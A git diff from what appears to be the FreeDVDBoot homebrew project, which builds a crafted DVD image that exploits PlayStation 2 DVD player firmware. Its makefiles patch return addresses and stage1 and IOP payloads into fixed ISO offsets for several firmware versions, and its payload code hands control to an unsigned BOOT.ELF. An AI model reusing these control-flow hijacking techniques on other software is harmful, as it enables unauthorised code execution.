diff --git a/.clang-format b/.clang-format new file mode 100644 index 0000000..52e0bc7 --- /dev/null +++ b/.clang-format @@ -0,0 +1,116 @@ +--- +Language: Cpp +AccessModifierOffset: -4 +AlignAfterOpenBracket: Align +AlignConsecutiveAssignments: true +AlignConsecutiveBitFields: AcrossEmptyLinesAndComments +AlignConsecutiveDeclarations: false +AlignConsecutiveMacros: AcrossComments +AlignEscapedNewlines: Left +AlignOperands: Align +AlignTrailingComments: true +AllowAllArgumentsOnNextLine: false +AllowAllConstructorInitializersOnNextLine: true +AllowAllParametersOfDeclarationOnNextLine: true +AllowShortBlocksOnASingleLine: Empty +AllowShortCaseLabelsOnASingleLine: false +AllowShortEnumsOnASingleLine: true +AllowShortFunctionsOnASingleLine: All +AllowShortIfStatementsOnASingleLine: Never +AllowShortLambdasOnASingleLine: Empty +AllowShortLoopsOnASingleLine: false +AlwaysBreakAfterReturnType: None +AlwaysBreakBeforeMultilineStrings: false +AlwaysBreakTemplateDeclarations: true +BinPackArguments: true +BinPackParameters: true +BitFieldColonSpacing : Both +BreakBeforeBraces: Custom +BraceWrapping: + AfterCaseLabel: false + AfterClass: true + AfterControlStatement: false + AfterEnum: false + AfterFunction: true + AfterNamespace: true + AfterObjCDeclaration: false + AfterStruct: true + AfterUnion: true + AfterExternBlock: false + BeforeCatch: false + BeforeElse: false + BeforeLambdaBody: false + BeforeWhile: false + IndentBraces: false + SplitEmptyFunction: true + SplitEmptyRecord: true + SplitEmptyNamespace: true +BreakBeforeBinaryOperators: None +BreakBeforeConceptDeclarations: true +BreakBeforeTernaryOperators: false +BreakConstructorInitializers: BeforeComma +BreakStringLiterals: true +ColumnLimit: 0 +CommentPragmas: '^ (IWYU pragma:|NOLINT)' +ConstructorInitializerAllOnOneLineOrOnePerLine: false +ConstructorInitializerIndentWidth: 4 +ContinuationIndentWidth: 4 +Cpp11BracedListStyle: true +DeriveLineEnding: true +DerivePointerAlignment: false +DisableFormat: false +EmptyLineBeforeAccessModifier: LogicalBlock +FixNamespaceComments: true +ForEachMacros: [] +IncludeBlocks: Preserve +IndentExternBlock: NoIndent +IndentCaseBlocks: false +IndentCaseLabels: true +IndentGotoLabels: true +IndentWidth: 4 +IndentWrappedFunctionNames: false +KeepEmptyLinesAtTheStartOfBlocks: true +MacroBlockBegin: '' +MacroBlockEnd: '' +MaxEmptyLinesToKeep: 3 +NamespaceIndentation: None +ObjCBlockIndentWidth: 2 +ObjCSpaceAfterProperty: false +ObjCSpaceBeforeProtocolList: true +PenaltyBreakAssignment: 80 +PenaltyBreakBeforeFirstCallParameter: 19 +PenaltyBreakComment: 300 +PenaltyBreakFirstLessLess: 120 +PenaltyBreakString: 1000 +PenaltyBreakTemplateDeclaration: 80 +PenaltyExcessCharacter: 1000000 +PenaltyIndentedWhitespace: 80 +PenaltyReturnTypeOnItsOwnLine: 60 +PointerAlignment: Right +# uncomment below when clang >13 will be out +# IndentPPDirectives: AfterHash +# PPIndentWidth: 1 +ReflowComments: true +SortIncludes: false +SpaceAfterCStyleCast: false +SpaceAfterLogicalNot: false +SpaceAroundPointerQualifiers: Default +SpaceBeforeAssignmentOperators: true +SpaceBeforeCaseColon: false +SpaceBeforeCpp11BracedList: true +SpaceBeforeInheritanceColon: false +SpaceBeforeParens: ControlStatements +SpaceBeforeRangeBasedForLoopColon: true +SpaceBeforeSquareBrackets: false +SpaceInEmptyBlock: false +SpaceInEmptyParentheses: false +SpacesBeforeTrailingComments: 1 +SpacesInAngles: false +SpacesInConditionalStatement: false +SpacesInContainerLiterals: true +SpacesInCStyleCastParentheses: false +SpacesInParentheses: false +SpacesInSquareBrackets: false +Standard: Cpp11 +TabWidth: 4 +UseTab: Never diff --git a/.editorconfig b/.editorconfig new file mode 100644 index 0000000..d3cb9a0 --- /dev/null +++ b/.editorconfig @@ -0,0 +1,25 @@ +# EditorConfig: http://EditorConfig.org + +# Top-most EditorConfig file +root = true + +# Unix-style newlines with a newline ending every file +[*] +end_of_line = lf +insert_final_newline = true +trim_trailing_whitespace = true +charset = utf-8 + +# 4 space indentation +[*.{c,h,js,css,html}] +indent_style = space +indent_size = 4 + +# 2 space indentation +[*.{json,xml,yaml,yml}] +indent_style = space +indent_size = 2 + +# Tab indentation +[Makefile*] +indent_style = tab diff --git a/.gitattributes b/.gitattributes new file mode 100644 index 0000000..1dc9955 --- /dev/null +++ b/.gitattributes @@ -0,0 +1,17 @@ +# Auto detect text files and perform LF normalization +* text=auto + +# Custom for Visual Studio +*.cs diff=csharp + +# Standard to msysgit +*.doc diff=astextplain +*.DOC diff=astextplain +*.docx diff=astextplain +*.DOCX diff=astextplain +*.dot diff=astextplain +*.DOT diff=astextplain +*.pdf diff=astextplain +*.PDF diff=astextplain +*.rtf diff=astextplain +*.RTF diff=astextplain diff --git a/.github/workflows/compilation.yml b/.github/workflows/compilation.yml new file mode 100644 index 0000000..824a006 --- /dev/null +++ b/.github/workflows/compilation.yml @@ -0,0 +1,106 @@ +name: CI-compile + +on: + push: + pull_request: + +jobs: + build: + name: Payload compilation + runs-on: ubuntu-latest + container: ps2dev/ps2dev:v1.0 + # instead of "ps2dev/ps2dev:latest" you can use different tags, for example for old projects you can use "ps2dev/ps2dev:v1.0" + steps: + - name: Install dependencies + run: | + apk add build-base git zip grep cdrkit bash + + - uses: actions/checkout@v2 + - run: | + git fetch --prune --unshallow + + - name: Get short SHA and repository name + id: slug + run: | + echo "::set-output name=sha8::$(echo ${GITHUB_SHA} | cut -c1-8)" + echo "::set-output name=REPOSITORY_NAME::$(echo "$GITHUB_REPOSITORY" | awk -F / '{print $2}' | sed -e "s/:refs//")" + + - name: Compile payload >=3.03 + shell: bash + run: | + export PS4='+(${BASH_SOURCE}:${LINENO}): ${FUNCNAME[0]:+${FUNCNAME[0]}(): }' + cd "PAYLOADS/3.03-3.11" + ls -l + ./build.sh + ls -l + md5sum *.bin + + - name: Upload artifacts >=3.03 + if: ${{ success() }} + uses: actions/upload-artifact@v2 + with: + name: PAYLOADS_303-311_${{ steps.slug.outputs.sha8 }} + path: | + PAYLOADS/3.03-3.11 + + - name: Compile payload <2.13 + run: | + export PS4='+(${BASH_SOURCE}:${LINENO}): ${FUNCNAME[0]:+${FUNCNAME[0]}(): }' + cd "PAYLOADS/1.00-2.13" + make -B -f hardware.mk + ls -l + md5sum *.bin + + - name: Upload artifacts <2.13 + if: ${{ success() }} + uses: actions/upload-artifact@v2 + with: + name: PAYLOADS_110-213_${{ steps.slug.outputs.sha8 }} + path: | + PAYLOADS/1.00-2.13 + + - name: Compile payload <2.13 (PCSX2 version) + run: | + export PS4='+(${BASH_SOURCE}:${LINENO}): ${FUNCNAME[0]:+${FUNCNAME[0]}(): }' + cd "PAYLOADS/1.00-2.13" + make -B -f emulator.mk + ls -l + md5sum *.bin + + - name: Upload artifacts <2.13 (PCSX2 version) + if: ${{ success() }} + uses: actions/upload-artifact@v2 + with: + name: PAYLOADS_110-213_PCSX2_${{ steps.slug.outputs.sha8 }} + path: | + PAYLOADS/1.00-2.13 + !PAYLOADS/1.00-2.13/dvd.iso.bin + + - run: | + mv PAYLOADS/3.03-3.11/exploit.iso FreeDVDBoot_3.03-3.11_${{ steps.slug.outputs.sha8 }}.iso + zip FreeDVDBoot_3.03-3.11_${{ steps.slug.outputs.sha8 }}.zip FreeDVDBoot_3.03-3.11_${{ steps.slug.outputs.sha8 }}.iso + mv PAYLOADS/1.00-2.13/dvd.iso FreeDVDBoot_1.00-2.13_${{ steps.slug.outputs.sha8 }}.iso + zip FreeDVDBoot_1.00-2.13_${{ steps.slug.outputs.sha8 }}.zip FreeDVDBoot_1.00-2.13_${{ steps.slug.outputs.sha8 }}.iso + mv PAYLOADS/1.00-2.13/dvd_pcsx2.iso FreeDVDBoot_1.00-2.13_PCSX2_${{ steps.slug.outputs.sha8 }}.iso + zip FreeDVDBoot_1.00-2.13_PCSX2_${{ steps.slug.outputs.sha8 }}.zip FreeDVDBoot_1.00-2.13_PCSX2_${{ steps.slug.outputs.sha8 }}.iso + + - name: Create pre-release + if: github.ref == 'refs/heads/master' + uses: marvinpinto/action-automatic-releases@latest + with: + repo_token: "${{ secrets.GITHUB_TOKEN }}" + prerelease: true + automatic_release_tag: "latest" + title: "Development build" + files: | + *.zip + + - name: Create Tagged Release Draft + if: startsWith(github.ref, 'refs/tags/v') + uses: marvinpinto/action-automatic-releases@latest + with: + repo_token: "${{ secrets.GITHUB_TOKEN }}" + prerelease: false + draft: true + files: | + *.zip diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..4e78420 --- /dev/null +++ b/.gitignore @@ -0,0 +1,39 @@ +# +# NOTE! Please use 'git ls-files -i --exclude-standard -c' +# command after changing this file, to see if there are +# any tracked files which get ignored after the change. +# +# Normal rules +# +.* +*.a +*.diff +*.elf +*.ELF +*.erl +*.exe +*.irx +*.map +*.o +*.patch +*.rej +*.zip +*.ZIP +*.a + +# +# files that we don't want to ignore +# +!.gitignore +!.gitattributes +!.github +!.editorconfig +!.clang-format + +!BOOT.ELF + +# +# Generated source files +# +*.bin +dvd.iso diff --git a/Filesystems/3.04M+ - English language/VIDEO_TS/VIDEO_TS.IFO b/Filesystems/3.04M+ - English language/VIDEO_TS/VIDEO_TS.IFO deleted file mode 100644 index d97fe69..0000000 Binary files a/Filesystems/3.04M+ - English language/VIDEO_TS/VIDEO_TS.IFO and /dev/null differ diff --git a/Filesystems/All PS2 slims (3.10 + 3.11) - English language/VIDEO_TS/VTS_02_0.IFO b/Filesystems/All PS2 slims (3.10 + 3.11) - English language/VIDEO_TS/VTS_02_0.IFO deleted file mode 100644 index d9f7983..0000000 Binary files a/Filesystems/All PS2 slims (3.10 + 3.11) - English language/VIDEO_TS/VTS_02_0.IFO and /dev/null differ diff --git a/PAYLOADS/1.00-2.13/Mainrules.mk b/PAYLOADS/1.00-2.13/Mainrules.mk index 687a3e7..748d779 100644 --- a/PAYLOADS/1.00-2.13/Mainrules.mk +++ b/PAYLOADS/1.00-2.13/Mainrules.mk @@ -1,50 +1,62 @@ -EE_CC = ee-gcc -EE_LD = ee-ld -EE_AS = ee-as -EE_OBJCOPY = ee-objcopy - -IOP_CC = iop-gcc -IOP_LD = iop-ld -IOP_AS = iop-as +EE_CC = ee-gcc +EE_LD = ee-ld +EE_AS = ee-as +EE_OBJCOPY = ee-objcopy + +IOP_CC = iop-gcc +IOP_LD = iop-ld +IOP_AS = iop-as IOP_OBJCOPY = iop-objcopy IOP_OBJDUMP = iop-objdump IOP_SYMBOLS = -DREAD_SECTORS_210=$(IOP_READ_SECTORS_210) -DORIGINAL_RETURN_ADDRESS_210=$(IOP_ORIGINAL_RETURN_ADDRESS_210) -DRETURN_ADDRESS_LOCATION_210=$(IOP_RETURN_ADDRESS_LOCATION_210) \ - -DREAD_SECTORS_212=$(IOP_READ_SECTORS_212) -DORIGINAL_RETURN_ADDRESS_212=$(IOP_ORIGINAL_RETURN_ADDRESS_212) -DRETURN_ADDRESS_LOCATION_212=$(IOP_RETURN_ADDRESS_LOCATION_212) \ - -DREAD_SECTORS_213=$(IOP_READ_SECTORS_213) -DORIGINAL_RETURN_ADDRESS_213=$(IOP_ORIGINAL_RETURN_ADDRESS_213) -DRETURN_ADDRESS_LOCATION_213=$(IOP_RETURN_ADDRESS_LOCATION_213) \ - -DREAD_SECTORS_110=$(IOP_READ_SECTORS_110) -DORIGINAL_RETURN_ADDRESS_110=$(IOP_ORIGINAL_RETURN_ADDRESS_110) -DRETURN_ADDRESS_LOCATION_110=$(IOP_RETURN_ADDRESS_LOCATION_110) + -DREAD_SECTORS_212=$(IOP_READ_SECTORS_212) -DORIGINAL_RETURN_ADDRESS_212=$(IOP_ORIGINAL_RETURN_ADDRESS_212) -DRETURN_ADDRESS_LOCATION_212=$(IOP_RETURN_ADDRESS_LOCATION_212) \ + -DREAD_SECTORS_213=$(IOP_READ_SECTORS_213) -DORIGINAL_RETURN_ADDRESS_213=$(IOP_ORIGINAL_RETURN_ADDRESS_213) -DRETURN_ADDRESS_LOCATION_213=$(IOP_RETURN_ADDRESS_LOCATION_213) \ + -DREAD_SECTORS_110=$(IOP_READ_SECTORS_110) -DORIGINAL_RETURN_ADDRESS_110=$(IOP_ORIGINAL_RETURN_ADDRESS_110) -DRETURN_ADDRESS_LOCATION_110=$(IOP_RETURN_ADDRESS_LOCATION_110) IOP_CFLAGS = -O2 -G 0 -nostartfiles -nostdlib -ffreestanding -g $(IOP_SYMBOLS) EE_CFLAGS = -O2 -G 0 -nostartfiles -nostdlib -ffreestanding -Wl,-z,max-page-size=0x1 IOP_STAGE1_SIZE_210_212 = `stat -c '%s' stage1_210_212.iop.bin` -IOP_STAGE1_SIZE_213 = `stat -c '%s' stage1_213.iop.bin` -IOP_PAYLOAD_SIZE = `stat -c '%s' ioppayload.iop.bin` - -dvd.iso: dvd.base.iso stage1_210_212.iop.bin stage1_213.iop.bin ioppayload.iop.bin - #genisoimage -udf -o dvd.iso udf/ - # @echo Insert 0x00000048 to offset 0x0818AC in dvd.iso - # @echo Insert 0x00004000 to offset 0x0818B0 in dvd.iso - # @echo Insert 0x000B7548 to offset 0x0818F4 in dvd.iso - - # For now it's easier to just use a base dvd rather than attempting to generate an image and patch it - cp dvd.base.iso dvd.iso - - # Return address (2.10 - 2.13) 0x00818f4 = 530676 - printf $(STAGE1_LOAD_ADDRESS_STRING_210_212) | dd of=dvd.iso bs=1 seek=530676 count=4 conv=notrunc - - # Return address 1.10 (0x000818bc = 530620) - printf $(STAGE1_LOAD_ADDRESS_STRING_110) | dd of=dvd.iso bs=1 seek=530620 count=4 conv=notrunc +IOP_STAGE1_SIZE_213 = `stat -c '%s' stage1_213.iop.bin` +IOP_PAYLOAD_SIZE = `stat -c '%s' ioppayload.iop.bin` + +# dvd.iso: dvd.base.iso stage1_210_212.iop.bin stage1_213.iop.bin ioppayload.iop.bin +dvd.iso: stage1_210_212.iop.bin stage1_213.iop.bin ioppayload.iop.bin + mkdir -p udf/AUDIO_TS + genisoimage -udf -dvd-video -o $(ISO_NAME) udf/ + # mkisofs -UDF -o $(ISO_NAME) udf # Mac OS command + + # @echo Insert 0x00000048 to offset 0x00818AC = 530604 in dvd.iso + # @echo Insert 0x00004000 to offset 0x00818B0 = 530608 in dvd.iso + # @echo next one for pcsx2 version + # @echo Insert 0x000B7548 to offset 0x00818F4 = 530676 in dvd.iso + # TODO: probably this step is repeated twice, remove one step + # TODO: check why seek=$((0x00818AC)) is failing + # TODO: AKUHAK: what does TEMP1, TEMP2 stands for ?? + printf $(TEMP1) | dd of=$(ISO_NAME) bs=1 seek=530604 count=4 conv=notrunc + printf $(TEMP2) | dd of=$(ISO_NAME) bs=1 seek=530608 count=4 conv=notrunc + printf $(TEMP3) | dd of=$(ISO_NAME) bs=1 seek=530676 count=4 conv=notrunc + + # Cturt: For now it's easier to just use a base dvd rather than attempting to generate an image and patch it + # cp dvd.base.iso dvd.iso + + # Return address (2.10 - 2.13) 0x00818F4 = 530676 + printf $(STAGE1_LOAD_ADDRESS_STRING_210_212) | dd of=$(ISO_NAME) bs=1 seek=530676 count=4 conv=notrunc + + # Return address 1.10 (0x000818BC = 530620) + printf $(STAGE1_LOAD_ADDRESS_STRING_110) | dd of=$(ISO_NAME) bs=1 seek=530620 count=4 conv=notrunc # Old toolchains don't support this option, so just copy byte-by-byte... # bs=4096 iflag=skip_bytes,count_bytes - - dd if=stage1_210_212.iop.bin of=dvd.iso bs=1 seek=$(STAGE1_ISO_210_212) count=$(IOP_STAGE1_SIZE_210_212) conv=notrunc - dd if=stage1_213.iop.bin of=dvd.iso bs=1 seek=$(STAGE1_ISO_213) count=$(IOP_STAGE1_SIZE_213) conv=notrunc - + # AKuHAK: what does above means? Do we need relative offsets? + + dd if=stage1_210_212.iop.bin of=$(ISO_NAME) bs=1 seek=$(STAGE1_ISO_210_212) count=$(IOP_STAGE1_SIZE_210_212) conv=notrunc + dd if=stage1_213.iop.bin of=$(ISO_NAME) bs=1 seek=$(STAGE1_ISO_213) count=$(IOP_STAGE1_SIZE_213) conv=notrunc + # 0x700000 = 7340032 - dd if=ioppayload.iop.bin of=dvd.iso bs=1 seek=7340032 count=$(IOP_PAYLOAD_SIZE) conv=notrunc + dd if=ioppayload.iop.bin of=$(ISO_NAME) bs=1 seek=7340032 count=$(IOP_PAYLOAD_SIZE) conv=notrunc %.iop.bin: %.iop.elf $(IOP_OBJCOPY) -O binary $< $@ @@ -54,16 +66,17 @@ dvd.iso: dvd.base.iso stage1_210_212.iop.bin stage1_213.iop.bin ioppayload.iop.b stage1_210_212.iop.elf: stage1_210_212.iop.S ioppayload.iop.bin $(IOP_OBJDUMP) -t ioppayload.iop.elf | grep " _start" + # $(echo 0x"$IOP_PAYLOAD_ENTRY" | awk '{print $1}') $(IOP_CC) $< -DENTRY=$(IOP_PAYLOAD_ENTRY) -DIOP_PAYLOAD_SIZE=$(IOP_PAYLOAD_SIZE) $(IOP_CFLAGS) -o $@ stage1_213.iop.elf: stage1_213.iop.S ioppayload.iop.bin $(IOP_OBJDUMP) -t ioppayload.iop.elf | grep " _start" + # $(echo 0x"$IOP_PAYLOAD_ENTRY" | awk '{print $1}') $(IOP_CC) $< -DENTRY=$(IOP_PAYLOAD_ENTRY) -DIOP_PAYLOAD_SIZE=$(IOP_PAYLOAD_SIZE) $(IOP_CFLAGS) -o $@ %.iop.elf: %.iop.c eepayload.ee.bin $(IOP_CC) -Ttext=$(IOP_PAYLOAD_ADDRESS) -DLOAD_ELF_FROM_OFFSET=$(LOAD_ELF_FROM_OFFSET) ioppayload.iop.c $(IOP_CFLAGS) -o $@ - %.ee.bin: %.ee.elf $(EE_OBJCOPY) -O binary $< $@ -Wl,-z,max-page-size=0x1 @@ -74,4 +87,4 @@ eepayload.ee.elf: eecrt0.ee.o syscalls.ee.o eepayload.ee.c $(EE_CC) -Ttext=$(EE_PAYLOAD_ADDRESS) $^ $(EE_CFLAGS) -o $@ clean: - rm -rf *.elf *.bin *.o dvd.iso + rm -rf *.iop.elf *.ee.elf *.bin *.o $(ISO_NAME) diff --git a/PAYLOADS/1.00-2.13/dvd.base.iso b/PAYLOADS/1.00-2.13/dvd.base.iso deleted file mode 100644 index 41540dd..0000000 Binary files a/PAYLOADS/1.00-2.13/dvd.base.iso and /dev/null differ diff --git a/PAYLOADS/1.00-2.13/eecrt0.ee.S b/PAYLOADS/1.00-2.13/eecrt0.ee.S index 9e4d82f..b690f26 100644 --- a/PAYLOADS/1.00-2.13/eecrt0.ee.S +++ b/PAYLOADS/1.00-2.13/eecrt0.ee.S @@ -4,22 +4,22 @@ .global _start _start: - # Point stack to end of scratchpad RAM - #la $sp, 0x70004000 + # Point stack to end of scratchpad RAM + # la $sp, 0x70004000 .global main - #la $v1, 0x01 - #la $a0, 0x7f - #syscall 0x01 # ResetEE - - la $a0, main - la $a1, 0 - la $a2, 0 - la $a3, 0 + # la $v1, 0x01 + # la $a0, 0x7f + # syscall 0x01 # ResetEE - jr $a0 + la $a0, main + la $a1, 0 + la $a2, 0 + la $a3, 0 + + jr $a0 # Don't use on phat PS2... completely broken syscall #ExecPS2: -# la $v1, 0x07 -# syscall 0x07 # ExecPS2 +# la $v1, 0x07 +# syscall 0x07 # ExecPS2 diff --git a/PAYLOADS/1.00-2.13/eepayload.ee.c b/PAYLOADS/1.00-2.13/eepayload.ee.c index 26f227a..eeb529a 100644 --- a/PAYLOADS/1.00-2.13/eepayload.ee.c +++ b/PAYLOADS/1.00-2.13/eepayload.ee.c @@ -1,67 +1,73 @@ // ElReino & CTurt 2020 -//int (*SifIopReset)(char *, int) = (void *)0x85360; -//void (*SifInitRpc)(int) = (void *)0x84500; -//void (*SifExitRpc)(void) = (void *)0x84690; +// int (*SifIopReset)(char *, int) = (void *)0x85360; +// void (*SifInitRpc)(int) = (void *)0x84500; +// void (*SifExitRpc)(void) = (void *)0x84690; extern void SifWriteBackDCache(void *ptr, int size); extern int SifSetReg(unsigned int register_num, unsigned int register_value); extern int SifGetReg(unsigned int register_num); -static int SifIopSync(void) { - #define SIF_REG_SMFLAG 4 - #define SIF_STAT_BOOTEND 0x40000 - return((SifGetReg(SIF_REG_SMFLAG) & SIF_STAT_BOOTEND) != 0); +static int SifIopSync(void) +{ +#define SIF_REG_SMFLAG 4 +#define SIF_STAT_BOOTEND 0x40000 + return ((SifGetReg(SIF_REG_SMFLAG) & SIF_STAT_BOOTEND) != 0); } -static void flush(void) { - asm volatile("la $v1, 0x64; la $a0, 0; syscall 0x64"); // FlushCache data writeback - asm volatile("la $v1, 0x64; la $a0, 2; syscall 0x64"); // FlushCache instruction invalidate +static void flush(void) +{ + asm volatile("la $v1, 0x64; la $a0, 0; syscall 0x64"); // FlushCache data writeback + asm volatile("la $v1, 0x64; la $a0, 2; syscall 0x64"); // FlushCache instruction invalidate } - int GetThreadId(void); +int GetThreadId(void); void ChangeThreadPriority(int thread_id, int priority); int CancelWakeupThread(int thread_id); void TerminateThread(int thread_id); void DeleteThread(int thread_id); -static void TerminateAllThreads(void) { +static void TerminateAllThreads(void) +{ int i, ThreadID; - ThreadID=GetThreadId(); + ThreadID = GetThreadId(); ChangeThreadPriority(ThreadID, 0); CancelWakeupThread(ThreadID); - for(i=1; i<256; i++){ //Skip idle thread. - if(i!=ThreadID){ + for (i = 1; i < 256; i++) { // Skip idle thread. + if (i != ThreadID) { TerminateThread(i); DeleteThread(i); } } } -int main(void) { - // ExecPS2 is broken on Phat PS2... manually kill other threads instead - TerminateAllThreads(); +int main(void) +{ + // ExecPS2 is broken on Phat PS2... manually kill other threads instead + TerminateAllThreads(); - // Signal IOP that EE is Ready, willing, and fully enabled! - SifSetReg(3, 1); + // Signal IOP that EE is Ready, willing, and fully enabled! + SifSetReg(3, 1); - volatile int *waitAddress = (void *)0x21FFF7F0; - while(!*waitAddress); + volatile int *waitAddress = (void *)0x21FFF7F0; + while (!*waitAddress) + ; - volatile void **entry_point_address = (void *)0x01FFF7E0; + volatile void **entry_point_address = (void *)0x01FFF7E0; - // cdrom0: - volatile void **argument = (void *)0x01FFF7D0; - *(volatile int *)0x01FFF7D0 = 0x01FFF7D8; - *(volatile int *)0x01FFF7D8 = 0x6F726463; - *(volatile int *)0x01FFF7DC = 0x003A306D; + // cdrom0: + volatile void **argument = (void *)0x01FFF7D0; + *(volatile int *)0x01FFF7D0 = 0x01FFF7D8; + *(volatile int *)0x01FFF7D8 = 0x6F726463; + *(volatile int *)0x01FFF7DC = 0x003A306D; - flush(); - - //SifIopReset("rom0:UDNL rom0:EELOADCNF", 0); - //while(!SifIopSync()); + flush(); - //ExecPS2(*entry_point_address, 0, 0, 0); - ExecPS2(*entry_point_address, 0, 1, argument); // kHn: arg == cdrom0: + // SifIopReset("rom0:UDNL rom0:EELOADCNF", 0); + // while (!SifIopSync()) + // ; + + // ExecPS2(*entry_point_address, 0, 0, 0); + ExecPS2(*entry_point_address, 0, 1, argument); // kHn: arg == cdrom0: } diff --git a/PAYLOADS/1.00-2.13/emulator.mk b/PAYLOADS/1.00-2.13/emulator.mk index 8252377..9e4c6e8 100644 --- a/PAYLOADS/1.00-2.13/emulator.mk +++ b/PAYLOADS/1.00-2.13/emulator.mk @@ -1,37 +1,45 @@ -#STAGE1_LOAD_ADDRESS_110 = 0xa00b66a8 -#STAGE1_LOAD_ADDRESS_STRING_110 = '\xa8\x66\x0b\xa0' +# TODO: try to run original DVD players in the pcsx2 (with balika's magicgate support), not the krHACKen ones +TEMP1 = '\x48\x00\x00\x00' +TEMP2 = '\x00\x40\x00\x00' +TEMP3 = '\x48\x75\x0B\x00' -STAGE1_LOAD_ADDRESS_210_212 = 0xa00b7548 +ISO_NAME = dvd_pcsx2.iso + +STAGE1_LOAD_ADDRESS_110 = 0xA00B66A8 +STAGE1_LOAD_ADDRESS_STRING_110 = '\xa8\x66\x0b\xa0' + +STAGE1_LOAD_ADDRESS_210_212 = 0xA00B7548 STAGE1_LOAD_ADDRESS_STRING_210_212 = '\x48\x75\x0b\xa0' -STAGE1_LOAD_ADDRESS_213 = 0xa00b6fc8 +STAGE1_LOAD_ADDRESS_213 = 0xA00B6FC8 STAGE1_LOAD_ADDRESS_STRING_213 = '\xc8\x6f\x0b\xa0' -STAGE1_ISO_210_212 = 532728 # 0x820f8 -STAGE1_ISO_213 = 534136 # 0x82678 +STAGE1_ISO_210_212 = 532728 # 0x820F8 +STAGE1_ISO_213 = 534136 # 0x82678 -IOP_READ_SECTORS_110 = 0xb19e4 -IOP_READ_SECTORS_210 = 0xb260c -IOP_READ_SECTORS_212 = 0xb25f8 -IOP_READ_SECTORS_213 = 0xb21f8 -IOP_ORIGINAL_RETURN_ADDRESS_210 = 0xb3630 +IOP_READ_SECTORS_110 = 0xB19E4 +IOP_READ_SECTORS_210 = 0xB260C +IOP_READ_SECTORS_212 = 0xB25F8 +IOP_READ_SECTORS_213 = 0xB21F8 +IOP_ORIGINAL_RETURN_ADDRESS_210 = 0xB3630 IOP_ORIGINAL_RETURN_ADDRESS_212 = 0xB35D8 IOP_ORIGINAL_RETURN_ADDRESS_213 = 0xB31EC -IOP_RETURN_ADDRESS_LOCATION_210 = 0x1f62ac -IOP_RETURN_ADDRESS_LOCATION_212 = 0x1f62b4 +IOP_RETURN_ADDRESS_LOCATION_210 = 0x1F62AC +IOP_RETURN_ADDRESS_LOCATION_212 = 0x1F62B4 IOP_RETURN_ADDRESS_LOCATION_213 = 0x1F62B4 -#IOP_PAYLOAD_ENTRY = `$(IOP_OBJDUMP) -t ioppayload.iop.elf | grep " _start"` -IOP_PAYLOAD_ENTRY = 0xa00fd178 # Set this manually for now. +# IOP_PAYLOAD_ENTRY = `$(IOP_OBJDUMP) -t ioppayload.iop.elf | grep " _start"` +IOP_PAYLOAD_ENTRY = 0xA00FD178 # Set this manually for now. -IOP_PAYLOAD_ADDRESS = 0xa00fd000 +IOP_PAYLOAD_ADDRESS = 0xA00FD000 -EE_PAYLOAD_ADDRESS = 0x01fff800 +EE_PAYLOAD_ADDRESS = 0x01FFF800 -#isoinfo -l -i dvd.iso | grep "BOOT.ELF" -#var=`isoinfo -l -i dvd.iso | grep "BOOT.ELF" | grep -o -P "[0-9]*? -"` -# LOAD_ELF_FROM_OFFSET = -LOAD_ELF_FROM_OFFSET = 0x5BB000 # Set this manually for now +# isoinfo -l -i dvd.iso | grep "BOOT.ELF" +# var=`isoinfo -l -i dvd.iso | grep "BOOT.ELF" | grep -o -P "[0-9]*? -"` +# LOAD_ELF_FROM_OFFSET = +# LOAD_ELF_FROM_OFFSET = `isoinfo -l -i $(ISO_NAME) | grep BOOT.ELF | awk '{print $10*2048}'` +LOAD_ELF_FROM_OFFSET = 0x5BB000 # Set this manually for now TODO: check why it doesnt work include Mainrules.mk diff --git a/PAYLOADS/1.00-2.13/hardware.mk b/PAYLOADS/1.00-2.13/hardware.mk index 9d46db8..9590c3b 100644 --- a/PAYLOADS/1.00-2.13/hardware.mk +++ b/PAYLOADS/1.00-2.13/hardware.mk @@ -1,36 +1,46 @@ +TEMP1 = '\x48\x00\x00\x00' +TEMP2 = '\x00\x40\x00\x00' +TEMP3 = '\x48\x75\x0B\x00' +ISO_NAME = dvd.iso +STAGE1_LOAD_ADDRESS_110 = 0xA0061DA8 # 0xA00B66A8 + 0x5C700 - 0xB1000 +STAGE1_LOAD_ADDRESS_STRING_110 = '\xa8\x1d\x06\xa0' -STAGE1_LOAD_ADDRESS_210_212 = 0xa0062C48 +STAGE1_LOAD_ADDRESS_210_212 = 0xA0062C48 # 0xA00B7548 + 0x5C700 - 0xB1000 STAGE1_LOAD_ADDRESS_STRING_210_212 = '\x48\x2c\x06\xa0' -STAGE1_LOAD_ADDRESS_213 = 0xA00626C8 # 0xa00b6fc8 + 0x5c700 - 0xb1000 +STAGE1_LOAD_ADDRESS_213 = 0xA00626C8 # 0xA00B6FC8 + 0x5C700 - 0xB1000 STAGE1_LOAD_ADDRESS_STRING_213 = '\xc8\x26\x06\xa0' -STAGE1_ISO_210_212 = 532728 # 0x820f8 -STAGE1_ISO_213 = 534136 # 0x82678 +# AKuHAK: why in the provided DVD image Cturt uses 0x82100 (a bit higher than 0x820F8)? +STAGE1_ISO_210_212 = 532728 # 0x820F8 +STAGE1_ISO_213 = 534136 # 0x82678 -IOP_READ_SECTORS_210 = 0x5DD0C # 0xb260c + 0x5c700 - 0xb1000 -IOP_READ_SECTORS_212 = 0x5DCF8 # 0xb25f8 + 0x5c700 - 0xb1000 -IOP_READ_SECTORS_213 = 0x5D8F8 # 0xb21f8 + 0x5c700 - 0xb1000 -IOP_ORIGINAL_RETURN_ADDRESS_210 = 0x5ED30 # 0xb3630 + 0x5c700 - 0xb1000 -IOP_ORIGINAL_RETURN_ADDRESS_212 = 0x5ECD8 # 0xB35D8 + 0x5c700 - 0xb1000 -IOP_ORIGINAL_RETURN_ADDRESS_213 = 0x5E8EC # 0xB31EC + 0x5c700 - 0xb1000 -IOP_RETURN_ADDRESS_LOCATION_210 = 0x1F30AC # 0x1f62ac + 0x1F3058 - 0x1f6258 -IOP_RETURN_ADDRESS_LOCATION_212 = 0x1F30B4 # 0x1f62b4 + 0x1F3058 - 0x1f6258 -IOP_RETURN_ADDRESS_LOCATION_213 = 0x1F30B4 # 0x1F62B4 + 0x1F3058 - 0x1f6258 +IOP_READ_SECTORS_110 = 0x5D0E4 # 0xB19E4 + 0x5C700 - 0xB1000 +IOP_READ_SECTORS_210 = 0x5DD0C # 0xB260C + 0x5C700 - 0xB1000 +IOP_READ_SECTORS_212 = 0x5DCF8 # 0xB25F8 + 0x5C700 - 0xB1000 +IOP_READ_SECTORS_213 = 0x5D8F8 # 0xB21F8 + 0x5C700 - 0xB1000 